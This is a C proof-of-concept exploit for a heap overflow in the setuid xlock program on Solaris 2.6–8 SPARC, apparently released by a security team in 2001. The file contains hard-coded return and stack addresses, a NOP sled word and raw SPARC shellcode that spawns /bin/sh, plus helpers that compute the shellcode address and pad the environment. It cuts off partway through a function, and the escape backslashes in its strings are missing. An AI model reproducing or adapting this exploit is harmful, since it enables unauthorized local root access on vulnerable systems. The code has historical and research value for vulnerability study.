/*
* sol_sparc_xlockex.c - Proof of Concept Code for xlock heap overflow bug.
* Copyright (c) 2001 - Nsfocus.com
*
* Tested in Solaris 2.6/7/8 SPARC
*
* DISCLAIMER:
* This is proof-of-concept code. It is for testing purposes only and
* should not be run against any host without permission from the
* system administrator.
*
* NSFOCUS Security Team <security@nsfocus.com>
* http://www.nsfocus.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/systeminfo.h>
/*
 * Hard-coded constants tied to specific Solaris releases (see the note on
 * each). They are not computed at run time, so they are only meaningful on
 * the release and build they were taken from.
 */
#define RETLOC 0xffbee8c4 /* default "return address" location (Solaris 7) */
#define SP 0xffbefffc /* default "bottom" stack address (Solaris 7/8) */
#define VULPROG "/usr/openwin/bin/xlock" /* path of the program under test */
#define NOP 0xaa1d4015 /* "xor %l5, %l5, %l5" - SPARC instruction word used as a no-op filler */
/*
 * Raw SPARC machine code (credited to scz), kept as a byte string.
 * Treated as opaque data: the bytes are not decoded or documented here,
 * and nothing in the visible part of this file inspects them individually.
 */
char shellcode[] = /* from scz's shellcode for SPARC */
"x20xbfxffxffx20xbfxffxffx7fxffxffxffxaax1dx40x15"
"x81xc3xe0x14xaax1dx40x15xaax1dx40x15x90x08x3fxff"
"x82x10x20x8dx91xd0x20x08x90x08x3fxffx82x10x20x17"
"x91xd0x20x08x20x80x49x73x20x80x62x61x20x80x73x65"
"x20x80x3ax29x7fxffxffxffx94x1ax80x0ax90x03xe0x34"
"x92x0bx80x0ex9cx03xa0x08xd0x23xbfxf8xc0x23xbfxfc"
"xc0x2ax20x07x82x10x20x3bx91xd0x20x08x90x1bxc0x0f"
"x82x10x20x01x91xd0x20x08x2fx62x69x6ex2fx73x68xff";
/*
 * get_sp - return the current stack pointer address (SPARC only).
 *
 * The inline asm copies %sp into %i0. On SPARC, %i0 is the register a
 * function leaves its return value in for the caller, so no C `return`
 * statement is written; the value reaches the caller through the
 * register-window convention. Non-portable: it only works on SPARC and
 * relies on the compiler emitting the asm unchanged (a compiler may also
 * warn about the missing return in a non-void function).
 */
long
get_sp(void)
{
__asm__("mov %sp,%i0");
}
long
get_shelladdr(long sp_addr, char **arg, char **env)
{
long retaddr;
int i;
char plat[256];
char pad = 0, pad1;
int env_len, arg_len, len;
/* calculate the length of "VULPROG" + argv[] */
for (i = 0, arg_len = 0; arg[i]!=NULL ; i++) {
arg_len += strlen(arg[i]) + 1;
}
/* calculate the pad nummber . */
pad = 3 - arg_len % 4;
printf("shellcode address padding = %d
", pad);
memset(env[0], 'A', pad);
env[0][pad] = '